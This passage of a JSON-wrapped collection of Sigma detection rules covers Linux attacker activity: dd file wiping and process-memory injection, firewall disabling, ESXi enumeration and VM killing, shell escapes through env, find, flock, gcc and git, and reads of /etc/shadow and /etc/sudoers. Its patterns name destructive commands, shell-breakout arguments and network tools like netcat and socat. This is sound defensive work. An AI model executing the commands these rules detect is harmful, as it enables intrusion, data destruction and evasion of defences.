    "content": "title: DD File Overwrite\nid: 2953194b-e33c-4859-b9e8-05948c167447\nstatus: test\ndescription: Detects potential overwriting and deletion of a file using DD.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC\ndate: 2021-10-15\nmodified: 2022-07-07\ntags:\n    - attack.impact\n    - attack.t1485\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection1:\n        Image:\n            - '/bin/dd'\n            - '/usr/bin/dd'\n    selection2:\n        CommandLine|contains: 'of='\n    selection3:\n        CommandLine|contains:\n            - 'if=/dev/zero'\n            - 'if=/dev/null'\n    condition: all of selection*\nfalsepositives:\n    - Any user deleting files that way.\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_dd_process_injection.yml",
    "content": "title: Potential Linux Process Code Injection Via DD Utility\nid: 4cad6c64-d6df-42d6-8dae-eb78defdc415\nstatus: test\ndescription: Detects the injection of code by overwriting the memory map of a Linux process using the \"dd\" Linux command.\nreferences:\n    - https://www.aon.com/cyber-solutions/aon_cyber_labs/linux-based-inter-process-code-injection-without-ptrace2/\n    - https://github.com/AonCyberLabs/Cexigua/blob/34d338620afae4c6335ba8d8d499e1d7d3d5d7b5/overwrite.sh\nauthor: Joseph Kamau\ndate: 2023-12-01\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055.009\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/dd'\n        CommandLine|contains|all:\n            - 'of='\n            - '/proc/'\n            - '/mem'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_disable_ufw.yml",
    "content": "title: Ufw Force Stop Using Ufw-Init\nid: 84c9e83c-599a-458a-a0cb-0ecce44e807a\nstatus: test\ndescription: Detects attempts to force stop the ufw using ufw-init\nreferences:\n    - https://blogs.blackberry.com/\n    - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-01-18\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_init:\n        CommandLine|contains|all:\n            - '-ufw-init'\n            - 'force-stop'\n    selection_ufw:\n        CommandLine|contains|all:\n            - 'ufw'\n            - 'disable'\n    condition: 1 of selection_*\nfalsepositives:\n    - Network administrators\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_doas_execution.yml",
    "content": "title: Linux Doas Tool Execution\nid: 067d8238-7127-451c-a9ec-fa78045b618b\nstatus: stable\ndescription: Detects execution of the doas tool on a Linux host. This utility allows standard users to perform tasks as root, the same way sudo does.\nreferences:\n    - https://research.splunk.com/endpoint/linux_doas_tool_execution/\n    - https://www.makeuseof.com/how-to-install-and-use-doas/\nauthor: Sittikorn S, Teoderick Contreras\ndate: 2022-01-20\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/doas'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_env_shell_invocation.yml",
    "content": "title: Shell Invocation via Env Command - Linux\nid: bed978f8-7f3a-432b-82c5-9286a9b3031a\nstatus: test\ndescription: |\n    Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.\nreferences:\n    - https://gtfobins.github.io/gtfobins/env/#shell\n    - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html\nauthor: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)\ndate: 2024-09-02\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/env'\n        CommandLine|endswith:\n            - '/bin/bash'\n            - '/bin/dash'\n            - '/bin/fish'\n            - '/bin/sh'\n            - '/bin/zsh'\n    condition: selection\nfalsepositives:\n    - Github operations such as ghe-backup\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml",
    "content": "title: ESXi Network Configuration Discovery Via ESXCLI\nid: 33e814e0-1f00-4e43-9c34-31fb7ae2b174\nstatus: test\ndescription: Detects execution of the \"esxcli\" command with the \"network\" flag in order to retrieve information about the network configuration.\nreferences:\n    - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/\n    - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_network.html\nauthor: Cedric Maurugeon\ndate: 2023-09-04\ntags:\n    - attack.discovery\n    - attack.execution\n    - attack.t1033\n    - attack.t1007\n    - attack.t1059.012\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/esxcli'\n        CommandLine|contains: 'network'\n    selection_cli:\n        CommandLine|contains:\n            - ' get'\n            - ' list'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration activities\n# Note: level can be reduced to low in some envs\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_esxcli_permission_change_admin.yml",
    "content": "title: ESXi Admin Permission Assigned To Account Via ESXCLI\nid: 9691f58d-92c1-4416-8bf3-2edd753ec9cf\nstatus: test\ndescription: Detects execution of the \"esxcli\" command with the \"system\" and \"permission\" flags in order to assign admin permissions to an account.\nreferences:\n    - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-04\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1059.012\n    - attack.t1098\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/esxcli'\n        CommandLine|contains: 'system'\n        CommandLine|contains|all:\n            - ' permission '\n            - ' set'\n            - 'Admin'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml",
    "content": "title: ESXi Storage Information Discovery Via ESXCLI\nid: f41dada5-3f56-4232-8503-3fb7f9cf2d60\nstatus: test\ndescription: Detects execution of the \"esxcli\" command with the \"storage\" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.\nreferences:\n    - https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html\n    - https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html\n    - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_storage.html\nauthor: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon\ndate: 2023-09-04\ntags:\n    - attack.discovery\n    - attack.execution\n    - attack.t1033\n    - attack.t1007\n    - attack.t1059.012\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/esxcli'\n        CommandLine|contains: 'storage'\n    selection_cli:\n        CommandLine|contains:\n            - ' get'\n            - ' list'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration activities\n# Note: level can be reduced to low in some envs\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_esxcli_syslog_config_change.yml",
    "content": "title: ESXi Syslog Configuration Change Via ESXCLI\nid: 38eb1dbb-011f-40b1-a126-cf03a0210563\nstatus: test\ndescription: Detects changes to the ESXi syslog configuration via \"esxcli\"\nreferences:\n    - https://support.solarwinds.com/SuccessCenter/s/article/Configure-ESXi-Syslog-to-LEM?language=en_US\n    - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html\nauthor: Cedric Maurugeon\ndate: 2023-09-04\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1562.001\n    - attack.t1562.003\n    - attack.t1059.012\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/esxcli'\n        CommandLine|contains|all:\n            - 'system'\n            - 'syslog'\n            - 'config'\n        CommandLine|contains: ' set'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml",
    "content": "title: ESXi System Information Discovery Via ESXCLI\nid: e80273e1-9faf-40bc-bd85-dbaff104c4e9\nstatus: test\ndescription: Detects execution of the \"esxcli\" command with the \"system\" flag in order to retrieve information about the different components of the system, such as accounts, modules, NTP, etc.\nreferences:\n    - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/\n    - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html\nauthor: Cedric Maurugeon\ndate: 2023-09-04\ntags:\n    - attack.discovery\n    - attack.execution\n    - attack.t1033\n    - attack.t1007\n    - attack.t1059.012\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/esxcli'\n        CommandLine|contains: 'system'\n    selection_cli:\n        CommandLine|contains:\n            - ' get'\n            - ' list'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml",
    "content": "title: ESXi Account Creation Via ESXCLI\nid: b28e4eb3-8bbc-4f0c-819f-edfe8e2f25db\nstatus: test\ndescription: Detects user account creation on ESXi system via esxcli\nreferences:\n    - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html\nauthor: Cedric Maurugeon\ndate: 2023-08-22\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.t1136\n    - attack.t1059.012\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/esxcli'\n        CommandLine|contains|all:\n            - 'system '\n            - 'account '\n            - 'add '\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml",
    "content": "title: ESXi VM List Discovery Via ESXCLI\nid: 5f1573a7-363b-4114-9208-ad7a61de46eb\nstatus: test\ndescription: Detects execution of the \"esxcli\" command with the \"vm process list\" arguments in order to enumerate the running VMs (the command lists only VMs that are currently running, together with their world IDs).\nreferences:\n    - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/\n    - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vm.html\n    - https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/\n    - https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html\nauthor: Cedric Maurugeon\ndate: 2023-09-04\ntags:\n    - attack.discovery\n    - attack.execution\n    - attack.t1033\n    - attack.t1007\n    - attack.t1059.012\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/esxcli'\n        CommandLine|contains: 'vm process'\n        CommandLine|endswith: ' list'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_esxcli_vm_kill.yml",
    "content": "title: ESXi VM Kill Via ESXCLI\nid: 2992ac4d-31e9-4325-99f2-b18a73221bb2\nstatus: test\ndescription: Detects execution of the \"esxcli\" command with the \"vm\" and \"kill\" flag in order to kill/shutdown a specific VM.\nreferences:\n    - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/\n    - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vm.html\n    - https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/\n    - https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html\nauthor: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon\ndate: 2023-09-04\ntags:\n    - attack.execution\n    - attack.impact\n    - attack.t1059.012\n    - attack.t1529\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/esxcli'\n        CommandLine|contains|all:\n            - 'vm process'\n            - 'kill'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_esxcli_vsan_discovery.yml",
    "content": "title: ESXi VSAN Information Discovery Via ESXCLI\nid: d54c2f06-aca9-4e2b-81c9-5317858f4b79\nstatus: test\ndescription: Detects execution of the \"esxcli\" command with the \"vsan\" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.\nreferences:\n    - https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html\n    - https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html\n    - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vsan.html\nauthor: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon\ndate: 2023-09-04\ntags:\n    - attack.discovery\n    - attack.execution\n    - attack.t1033\n    - attack.t1007\n    - attack.t1059.012\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/esxcli'\n        CommandLine|contains: 'vsan'\n    selection_cli:\n        CommandLine|contains:\n            - ' get'\n            - ' list'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration activities\n# Note: level can be reduced to low in some envs\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml",
    "content": "title: File and Directory Discovery - Linux\nid: d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72\nstatus: test\ndescription: |\n    Detects usage of system utilities such as \"find\", \"tree\", \"findmnt\", etc, to discover files, directories and network shares.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md\nauthor: Daniil Yugoslavskiy, oscd.community, CheraghiMilad\ndate: 2020-10-19\nmodified: 2024-12-01\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_file_with_asterisk:\n        Image|endswith: '/file'\n        CommandLine|re: '(.){200,}' # execution of the 'file */* *>> /tmp/output.txt' will produce huge commandline\n    selection_recursive_ls:\n        Image|endswith: '/ls'\n        CommandLine|contains: '-R'\n    selection_find_execution:\n        Image|endswith: '/find'\n    selection_tree_execution:\n        Image|endswith: '/tree'\n    selection_findmnt_execution:\n        Image|endswith: '/findmnt'\n    selection_locate_execution:\n        Image|endswith: '/mlocate'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate activities\nlevel: informational\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_file_deletion.yml",
    "content": "title: File Deletion\nid: 30aed7b6-d2c1-4eaf-9382-b6bc43e50c57\nstatus: stable\ndescription: Detects file deletion using \"rm\", \"rmdir\", \"shred\" or \"unlink\" commands, which are often used by adversaries to delete files left behind by their intrusion activity\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md\nauthor: Ömer Günal, oscd.community\ndate: 2020-10-07\nmodified: 2022-09-15\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '/rm'\n            - '/rmdir'  # '/rmdir' does not end with '/rm', so it needs its own entry\n            - '/shred'\n            - '/unlink'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: informational\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_find_shell_execution.yml",
    "content": "title: Shell Execution via Find - Linux\nid: 6adfbf8f-52be-4444-9bac-81b539624146\nstatus: test\ndescription: |\n    Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.\nreferences:\n    - https://gtfobins.github.io/gtfobins/find/#shell\n    - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html\nauthor: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)\ndate: 2024-09-02\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/find'\n        CommandLine|contains|all:\n            - ' . '\n            - '-exec'\n    selection_cli:\n        CommandLine|contains:\n            - '/bin/bash'\n            - '/bin/dash'\n            - '/bin/fish'\n            - '/bin/sh'\n            - '/bin/zsh'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_flock_shell_execution.yml",
    "content": "title: Shell Execution via Flock - Linux\nid: 4b09c71e-4269-4111-9cdd-107d8867f0cc\nstatus: test\ndescription: |\n    Detects the use of the \"flock\" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\nreferences:\n    - https://gtfobins.github.io/gtfobins/flock/#shell\n    - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html\nauthor: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)\ndate: 2024-09-02\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/flock'\n        CommandLine|contains: ' -u '\n    selection_cli:\n        CommandLine|contains:\n            - '/bin/bash'\n            - '/bin/dash'\n            - '/bin/fish'\n            - '/bin/sh'\n            - '/bin/zsh'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_gcc_shell_execution.yml",
    "content": "title: Shell Execution via GCC - Linux\nid: 9b5de532-a757-4d70-946c-1f3e44f48b4d\nstatus: test\ndescription: |\n    Detects the use of the \"gcc\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\nreferences:\n    - https://gtfobins.github.io/gtfobins/gcc/#shell\n    - https://gtfobins.github.io/gtfobins/c89/#shell\n    - https://gtfobins.github.io/gtfobins/c99/#shell\n    - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html\nauthor: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)\ndate: 2024-09-02\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith:\n            - '/c89'\n            - '/c99'\n            - '/gcc'\n        CommandLine|contains: '-wrapper'\n    selection_cli:\n        CommandLine|contains:\n            - '/bin/bash,-s'\n            - '/bin/dash,-s'\n            - '/bin/fish,-s'\n            - '/bin/sh,-s'\n            - '/bin/zsh,-s'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_git_shell_execution.yml",
    "content": "title: Shell Execution via Git - Linux\nid: 47b3bbd4-1bf7-48cc-84ab-995362aaa75a\nstatus: test\ndescription: |\n    Detects the use of the \"git\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\nreferences:\n    - https://gtfobins.github.io/gtfobins/git/#shell\nauthor: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)\ndate: 2024-09-02\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        ParentImage|endswith: '/git'\n        ParentCommandLine|contains|all:\n            - ' -p '\n            - 'help'\n        CommandLine|contains:\n            - 'bash 0<&1'\n            - 'dash 0<&1'\n            - 'sh 0<&1'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_grep_os_arch_discovery.yml",
    "content": "title: OS Architecture Discovery Via Grep\nid: d27ab432-2199-483f-a297-03633c05bae6\nstatus: test\ndescription: |\n    Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of \"uname\" or \"cat /proc/cpuinfo\"\nreferences:\n    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html\n    - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/\n    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection\n    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-06-02\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_process:\n        Image|endswith: '/grep'\n    selection_architecture:\n        CommandLine|endswith:\n            - 'aarch64'\n            - 'arm'\n            - 'i386'\n            - 'i686'\n            - 'mips'\n            - 'x86_64'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_groupdel.yml",
    "content": "title: Group Has Been Deleted Via Groupdel\nid: 8a46f16c-8c4c-82d1-b121-0fdd3ba70a84\nstatus: test\ndescription: Detects execution of the \"groupdel\" binary, which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks\nreferences:\n    - https://linuxize.com/post/how-to-delete-group-in-linux/\n    - https://www.cyberciti.biz/faq/linux-remove-user-command/\n    - https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/\n    - https://linux.die.net/man/8/groupdel\nauthor: Tuan Le (NCSGroup)\ndate: 2022-12-26\ntags:\n    - attack.impact\n    - attack.t1531\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/groupdel'\n    condition: selection\nfalsepositives:\n    - Legitimate administrator activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml",
    "content": "title: Install Root Certificate\nid: 78a80655-a51e-4669-bc6b-e9d206a462ee\nstatus: test\ndescription: Detects installation of a new CA certificate into the system trust store, which attackers may use to avoid warnings when connecting to controlled web servers or C2s\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md\nauthor: Ömer Günal, oscd.community\ndate: 2020-10-05\nmodified: 2022-07-07\ntags:\n    - attack.defense-evasion\n    - attack.t1553.004\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '/update-ca-certificates'\n            - '/update-ca-trust'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_install_suspicious_packages.yml",
    "content": "title: Suspicious Package Installed - Linux\nid: 700fb7e8-2981-401c-8430-be58e189e741\nstatus: test\ndescription: Detects installation of suspicious packages using system installation utilities\nreferences:\n    - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-03\nmodified: 2026-01-01\ntags:\n    - attack.defense-evasion\n    - attack.t1553.004\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_tool_apt:\n        Image|endswith:\n            - '/apt'\n            - '/apt-get'\n        CommandLine|contains: 'install'\n    selection_tool_yum:\n        Image|endswith: '/yum'\n        CommandLine|contains:\n            - 'localinstall'\n            - 'install'\n    selection_tool_rpm:\n        Image|endswith: '/rpm'\n        CommandLine|contains: '-i'\n    selection_tool_dpkg:\n        Image|endswith: '/dpkg'\n        CommandLine|contains:\n            - '--install'\n            - '-i'\n    selection_keyword:\n        CommandLine|contains:\n            # Add more suspicious packages\n            - 'nmap'\n            - ' nc'\n            - 'netcat'\n            - 'wireshark'\n            - 'tshark'\n            - 'openconnect'\n            - 'proxychains'\n            - 'socat'\n    condition: 1 of selection_tool_* and selection_keyword\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_iptables_flush_ufw.yml",
    "content": "title: Flush Iptables Ufw Chain\nid: 3be619f4-d9ec-4ea8-a173-18fdd01996ab\nstatus: test\ndescription: Detects the use of iptables to flush all firewall rules, tables and chains and allow all network traffic\nreferences:\n    - https://blogs.blackberry.com/\n    - https://www.cyberciti.biz/tips/linux-iptables-how-to-flush-all-rules.html\n    - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-01-18\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_img:\n        Image|endswith:\n            - '/iptables'\n            - '/xtables-legacy-multi'\n            - '/iptables-legacy-multi'\n            - '/ip6tables'\n            - '/ip6tables-legacy-multi'\n    selection_params:\n        CommandLine|contains:\n            - '-F'\n            - '-Z'\n            - '-X'\n    selection_ufw:\n        CommandLine|contains:\n            - 'ufw-logging-deny'\n            - 'ufw-logging-allow'\n            - 'ufw6-logging-deny'\n            - 'ufw6-logging-allow'\n            # - 'ufw-reject-output'\n            # - 'ufw-track-inputt'\n    condition: all of selection_*\nfalsepositives:\n    - Network administrators\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_local_account.yml",
    "content": "title: Local System Accounts Discovery - Linux\nid: b45e3d6f-42c6-47d8-a478-df6bd6cf534c\nstatus: test\ndescription: Detects enumeration of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md\n    - https://my.f5.com/manage/s/article/K589\n    - https://man.freebsd.org/cgi/man.cgi?pwd_mkdb\nauthor: Alejandro Ortuno, oscd.community, CheraghiMilad\ndate: 2020-10-08\nmodified: 2024-12-10\ntags:\n    - attack.discovery\n    - attack.t1087.001\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_1:\n        Image|endswith: '/lastlog'\n    selection_2:\n        CommandLine|contains: '''x:0:'''\n    selection_3:\n        Image|endswith:\n            - '/cat'\n            - '/ed'\n            - '/head'\n            - '/more'\n            - '/nano'\n            - '/tail'\n            - '/vi'\n            - '/vim'\n            - '/less'\n            - '/emacs'\n            - '/sqlite3'\n            - '/makemap'\n        CommandLine|contains:\n            - '/etc/passwd'\n            - '/etc/shadow'\n            - '/etc/sudoers'\n            - '/etc/spwd.db'\n            - '/etc/pwd.db'\n            - '/etc/master.passwd'\n    selection_4:\n        Image|endswith: '/id'\n    selection_5:\n        Image|endswith: '/lsof'\n        CommandLine|contains: '-u'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_local_groups.yml",
    "content": "title: Local Groups Discovery - Linux\nid: 676381a6-15ca-4d73-a9c8-6a22e970b90d\nstatus: test\ndescription: Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md\nauthor: Ömer Günal, Alejandro Ortuno, oscd.community\ndate: 2020-10-11\nmodified: 2025-06-04\ntags:\n    - attack.discovery\n    - attack.t1069.001\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_1:\n        Image|endswith: '/groups'\n    selection_2:\n        Image|endswith:\n            - '/cat'\n            - '/ed'\n            - '/head'\n            - '/less'\n            - '/more'\n            - '/nano'\n            - '/tail'\n            - '/vi'\n            - '/vim'\n        CommandLine|contains: '/etc/group'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml",
